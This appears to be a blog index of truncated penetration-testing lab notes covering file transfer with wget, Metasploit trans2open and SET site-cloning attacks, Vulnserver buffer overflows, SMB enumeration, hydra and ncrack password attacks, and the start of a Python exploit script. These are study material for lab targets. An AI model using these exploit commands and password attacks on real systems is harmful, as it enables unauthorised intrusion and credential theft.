File transfer type: 1. HTTP Transfer files through the website. 2.wget wget http://10.0.0.109/exploit.php 3.FTP python FTP (1)Install python FTP on the Kali Linux. pip3 install pyftpdlib (2)Move to the target folder, and start the FTP service. python…

Metasploit Attack Target Server: IE8 on WinXP 1.Start the Metasploit. setoolkit 2.Select 2)Website Attack Vectors. 3.Select 1)Java Applet Attack Method. 4.Select 2)Site Cloner. And set the parameters in this module. 5.Select 1)Meterpreter Memory Inje…

Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the module and options. search trans2open use exploit/linux/samba/trans2open set RHOST 10.0.0.13 show options exploit (3)Exploit the Kioptrix Level 1 server.(F…

Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concepts Understanding of basic Linux syntax A "Try Harder" attitude Modules: Introduction to Kali Linux Infromation Gatheing Scanning Enumeration Netc…

Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver Immunity Debuger - https://www.immunityinc.com/products/debugger/ Vulnserver Test 1. Open the vulnserver…

SMB Enumeration 1. Set the smb configurations. locate smb.conf vim /etc/samba/smb.conf Insert the global settings to the configuration file. client use spnego = no client ntlmv2 auth = no 2. Enumerate the target computer and find some interestring th…

Install Kali Linux : https://www.kali.org/ Common Commands: pwd man ls ls -la cd mkdir rmdir cp mv locate adduser su sudo echo cat nano chmod chmod 777 username ifconfig ping Starting and Stopping Services: HTTP /var/www/html apache2 SSH netstat -ant…

Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FIL…

Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options] {target and service specification}TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.…

 Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ #!/usr/bin/python import socket import os import sys host="192.168.2.135"…